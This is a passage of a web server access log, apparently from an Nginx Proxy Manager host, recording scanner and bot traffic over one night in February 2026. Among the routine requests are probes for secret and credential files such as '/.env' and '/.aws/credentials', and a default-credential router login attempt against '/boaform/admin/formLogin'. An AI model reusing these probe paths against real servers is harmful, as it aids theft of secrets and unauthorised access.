(compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:23:58:44 +0000] 404 - GET http 222.117.41.51 "/.env.staging" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:23:58:45 +0000] 404 - GET http 222.117.41.51 "/.env.production" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:23:58:46 +0000] 404 - GET http 222.117.41.51 "/.env.development" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:23:58:46 +0000] 404 - GET http 222.117.41.51 "/.aws/credentials" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:23:58:47 +0000] 404 - GET http 222.117.41.51 "/app/.env" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[16/Feb/2026:23:58:47 +0000] 404 - GET http 222.117.41.51 "/config.json" [Client 45.135.193.11] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; NetScope/1.0; +http://45.135.193.11/; security research scanner \xE2\x80\x94 submit exclusion requests at the linked URL)" "-" -[17/Feb/2026:00:07:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:00:17:15 +0000] 400 - GET http localhost "/" [Client 104.28.233.73] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:00:18:41 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:00:21:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:00:26:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:00:37:05 +0000] 400 - GET http 222.117.41.51 "/" [Client 185.180.141.44] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" -[17/Feb/2026:00:37:11 +0000] 400 - POST http 222.117.41.51 "/mcp" [Client 185.180.141.42] [Length 252] [Gzip -] "python-httpx/0.28.1" "-" -[17/Feb/2026:00:37:12 +0000] 400 - GET http 222.117.41.51 "/sse" [Client 185.180.141.42] [Length 252] [Gzip -] "python-httpx/0.28.1" "-" -[17/Feb/2026:00:37:12 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 185.180.141.42] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" -[17/Feb/2026:00:37:54 +0000] 404 - GET http 222.117.41.51 "/hudson" [Client 20.163.14.222] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[17/Feb/2026:00:43:58 +0000] 404 - GET http 222.117.41.51 "/developmentserver/metadatauploader" [Client 20.80.88.32] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[17/Feb/2026:00:46:30 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:00:50:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 159.224.204.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-" -[17/Feb/2026:00:50:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:00:54:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.153.119.119] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[17/Feb/2026:01:03:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:01:12:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:01:13:04 +0000] 400 - - http localhost "-" [Client 176.65.148.19] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:01:17:34 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:01:37:29 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 198.235.24.75] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[17/Feb/2026:01:37:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:01:56:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:02:03:10 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:02:18:33 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:02:23:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 122.97.137.32] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:02:27:33 +0000] 200 - GET http 222.117.41.51 "/" [Client 172.104.11.46] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:27:54 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[17/Feb/2026:02:27:54 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[17/Feb/2026:02:27:55 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[17/Feb/2026:02:27:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:02:27:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:02:30:07 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:02:35:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 49.51.183.15] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[17/Feb/2026:02:35:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:02:46:37 +0000] 400 - GET http 222.117.41.51 "/" [Client 118.26.37.105] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" -[17/Feb/2026:02:46:39 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 118.26.37.105] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" -[17/Feb/2026:02:46:41 +0000] 400 - GET http 222.117.41.51 "/robots.txt" [Client 118.26.37.105] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" -[17/Feb/2026:02:46:43 +0000] 400 - GET http 222.117.41.51 "/sitemap.xml" [Client 118.26.37.105] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" -[17/Feb/2026:02:55:33 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:02:56:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:03:09:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:03:14:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:03:20:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:03:30:16 +0000] 400 - GET http 222.117.41.51 "/" [Client 167.94.146.56] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[17/Feb/2026:03:30:17 +0000] 400 - - http localhost "-" [Client 167.94.146.56] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:03:30:22 +0000] 400 - GET http 222.117.41.51 "/sitemap.xml" [Client 167.94.146.56] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[17/Feb/2026:03:35:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.196] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:03:35:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 198.235.24.196] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:03:37:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:03:40:10 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[17/Feb/2026:03:40:10 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" -[17/Feb/2026:03:40:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:03:40:11 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" -[17/Feb/2026:03:40:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:03:40:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:03:40:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:03:40:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:03:40:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:03:40:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:03:40:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.170.172.128] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[17/Feb/2026:03:40:49 +0000] 405 - POST http 222.117.41.51 "/" [Client 195.170.172.128] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[17/Feb/2026:03:40:50 +0000] 405 - POST http 222.117.41.51 "/" [Client 195.170.172.128] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[17/Feb/2026:03:40:50 +0000] 404 - GET http 222.117.41.51 "/WuEL" [Client 195.170.172.128] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)" "-" -[17/Feb/2026:03:40:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.170.172.128] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:03:40:51 +0000] 404 - GET http 222.117.41.51 "/a" [Client 195.170.172.128] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[17/Feb/2026:03:40:52 +0000] 404 - GET http 222.117.41.51 "/download/file.ext" [Client 195.170.172.128] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[17/Feb/2026:03:40:53 +0000] 404 - GET http 222.117.41.51 "/SiteLoader" [Client 195.170.172.128] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[17/Feb/2026:03:40:53 +0000] 404 - GET http 222.117.41.51 "/mPlayer" [Client 195.170.172.128] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[17/Feb/2026:03:40:54 +0000] 405 - POST http 222.117.41.51 "/" [Client 195.170.172.128] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[17/Feb/2026:03:40:55 +0000] 400 - GET http 222.117.41.51 "/" [Client 195.170.172.128] [Length 632] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" -[17/Feb/2026:03:43:50 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:03:51:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:04:09:37 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:04:11:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:04:34:40 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:04:41:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 54.196.222.60] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" -[17/Feb/2026:04:45:35 +0000] 400 - GET http 222.117.41.51 "/version" [Client 101.36.108.184] [Length 252] [Gzip -] "-" "-" -[17/Feb/2026:04:45:35 +0000] 400 - GET http 222.117.41.51 "/" [Client 101.36.108.184] [Length 252] [Gzip -] "-" "-" -[17/Feb/2026:04:45:35 +0000] 400 - GET http 222.117.41.51 "/" [Client 101.36.108.184] [Length 252] [Gzip -] "-" "-" -[17/Feb/2026:04:45:35 +0000] 400 - GET http 222.117.41.51 "/v1" [Client 101.36.108.184] [Length 252] [Gzip -] "-" "-" -[17/Feb/2026:04:45:36 +0000] 400 - - http localhost "-" [Client 101.36.108.184] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:04:45:36 +0000] 400 - - http localhost "-" [Client 101.36.108.184] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:04:45:39 +0000] 400 - GET http 222.117.41.51 "/" [Client 101.36.108.184] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[17/Feb/2026:04:45:40 +0000] 400 - GET http 222.117.41.51 "/" [Client 45.142.154.64] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[17/Feb/2026:04:45:41 +0000] 400 - GET http 222.117.41.51 "/" [Client 45.142.154.65] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[17/Feb/2026:04:53:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 167.94.138.201] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[17/Feb/2026:04:53:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.201] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:04:53:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.201] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:04:53:32 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[17/Feb/2026:04:53:36 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:04:53:47 +0000] 404 - GET http 222.117.41.51 "/login" [Client 167.94.138.201] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[17/Feb/2026:04:53:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.201] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:05:03:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:05:11:42 +0000] 404 - GET http 222.117.41.51 "/actuator/health" [Client 20.65.193.129] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" -[17/Feb/2026:05:20:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 24.144.102.19] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[17/Feb/2026:05:20:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:05:25:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:05:26:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:05:30:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 198.235.24.207] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[17/Feb/2026:05:34:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:05:48:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:05:51:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:06:06:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.94.31.224] [Length 0] [Gzip -] "-" "-" -[17/Feb/2026:06:15:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:06:18:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:06:33:59 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:06:36:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 184.105.247.195] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" "-" -[17/Feb/2026:06:37:50 +0000] 404 - GET http 222.117.41.51 "/webui/" [Client 184.105.247.195] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" "-" -[17/Feb/2026:06:39:24 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[17/Feb/2026:06:40:28 +0000] 404 - GET http 222.117.41.51 "/geoserver/web/" [Client 184.105.247.195] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" "-" -[17/Feb/2026:06:40:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:06:43:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:06:46:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.156.129.132] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" -[17/Feb/2026:06:54:06 +0000] 400 - GET http 222.117.41.51 "/" [Client 18.218.118.203] [Length 654] [Gzip -] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[17/Feb/2026:06:54:12 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=user&psd=user" [Client 124.29.214.186] [Length 150] [Gzip -] "-" "-" -[17/Feb/2026:06:54:12 +0000] 400 - - http localhost "-" [Client 18.218.118.203] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:06:54:16 +0000] 400 - GET http 222.117.41.51 "/" [Client 18.218.118.203] [Length 654] [Gzip -] "visionheight.com/scan Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" -[17/Feb/2026:06:59:27 +0000] 400 - - http localhost "-" [Client 